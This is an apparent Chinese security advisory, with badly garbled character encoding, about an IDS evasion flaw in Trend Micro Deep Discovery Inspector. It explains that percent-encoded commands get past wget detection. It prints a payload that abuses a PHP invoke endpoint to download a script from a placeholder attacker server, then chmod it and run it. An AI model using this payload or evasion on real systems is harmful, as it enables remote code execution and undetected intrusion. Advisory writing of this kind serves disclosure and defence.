Trend Micro Deep Discovery Inspector IDSÇå¾²ÈƹýÎó²îÇ徲ͨ¸æ

Ðû²¼Ê±¼ä 2019-07-26

Îó²î±àºÅºÍ¼¶±ð


CVE±àºÅ£ºÔÝÎÞ£¬£¬£¬Î£ÏÕ¼¶±ð£º¸ßΣ£¬£¬£¬CVSS·ÖÖµ£º¹Ù·½Î´ÆÀ¶¨


Ó°Ïì°æ±¾


ÊÜÓ°ÏìµÄ°æ±¾


Trend Micro Deep Discovery Inspector IDS


Îó²î¸ÅÊö


Trend Micro Deep Discovery Inspector IDS ÊÇÒ»ÖÖÍøÂç×°±¸£¬£¬£¬¿É¼à¿ØËùÓÐÀàÐͺÍÁè¼Ý105ÖÖ²î±ðµÄÍøÂçЭÒ飬£¬£¬ÒÔ·¢Ã÷ÊÕÖ§ÍøÂçµÄ¸ß¼¶ÍþвºÍÓÐÕë¶ÔÐԵĹ¥»÷¡£¡£¡£¡£2019Äê7ÔÂ24ÈÕ£¬£¬£¬Ñо¿Ö°Ô±Åû¶ÁËTrend Micro Deep Discovery Inspector IDS Çå¾²ÈƹýÎó²îµÄÏêÇé¡£¡£¡£¡£Çå¾²ÈƹýÎó²îÔ´ÓÚÍøÂçϵͳ»ò²úÆ·ÖÐȱÉÙÄÚÈÝÑéÖ¤¹æÔò»ò¶ÔÄÚÈÝÑé֤ǿ¶Èȱ·¦¡£¡£¡£¡£


Îó²îÑéÖ¤


¾­Ì«¹ýÎö£¬£¬£¬IDS·¢Ã÷¶ñÒâϵͳÏÂÁÈç¡°Wget  Commandline  Injection¡±£©»á·¢³ö¾¯±¨£¬£¬£¬²¢ÇÒ½«ËüÃDZê¼ÇΪ¸ßΣº¦¡£¡£¡£¡£¹¥»÷Õß½«payloadÓëͨË×µÄascii×Ö·ûÒ»Æð·¢ËÍ£¬£¬£¬ÀýÈç¡°wget¡±£¬£¬£¬×ÝÈ»ËüÃǾÙÐÐÁËÈç¡°\ x77 \ x67 \ x65 \ x74¡±µÄ±àÂ룬£¬£¬ÈԻᷢ³ö¾¯±¨¡£¡£¡£¡£¿ÉÊÇ£¬£¬£¬¹¥»÷Õß¿ÉÒÔͨ¹ýÔÚHEXÖÐÒÔ°Ù·ÖºÅ×Ö·û¡°£¥¡±¿ªÍ·µÄ¶ñÒâÏÂÁîÀ´ÇáËÉÈƹýÕâЩ¾¯±¨£¬£¬£¬ÀýÈ磬£¬£¬¡°£¥77£¥ 67£¥65£¥74¡±Ò²×ª»»Îª¡°wget¡±£¬£¬£¬²»µ«²»»á±»±ê¼Ç»òÖÒÑÔ£¬£¬£¬Ò²¿ÉÒÔÔÚÄ¿µÄϵͳÉÏÖ´ÐС£¡£¡£¡£


Payload£º


/index.php?s=/index/vulnerable/app/invoke&function=call_user_func_array&v ars[0]=system&vars[1][]=%77%67%65%74%20http://Attacker-Server/x.sh%20-O% 20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a


ÐÞ¸´½¨Òé


¹Ø×¢¹Ù·½ÍøÕ¾£¬£¬£¬ÊµÊ±ÏÂÔز¹¶¡¸üС£¡£¡£¡£


²Î¿¼Á´½Ó